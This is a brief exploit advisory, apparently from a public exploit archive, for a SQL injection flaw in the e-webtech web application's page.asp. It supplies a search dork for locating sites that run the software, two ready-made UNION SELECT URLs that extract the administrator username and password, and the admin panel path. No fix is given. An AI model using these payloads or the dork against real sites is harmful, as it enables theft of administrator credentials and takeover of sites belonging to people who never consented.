e-webtech (page.asp) SQL Injection Vulnerability

2010-05-11 09:31:35

-------------------------------------------------------------------------------------------

e-webtech (page.asp) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: [email protected]

Script Name: e-webtech

Dork: "Powerd by www.e-webtech.com"

-------------------------------------------------------------------------------------------

User Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,username+from+adminpassword

Password Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,pwd+from+adminpassword

Administartor Panel:

http://localhost/[path]/controlpanel/

-------------------------------------------------------------------------------------------

Fixes

No fixes

In order to submit a new fix you need to be registered.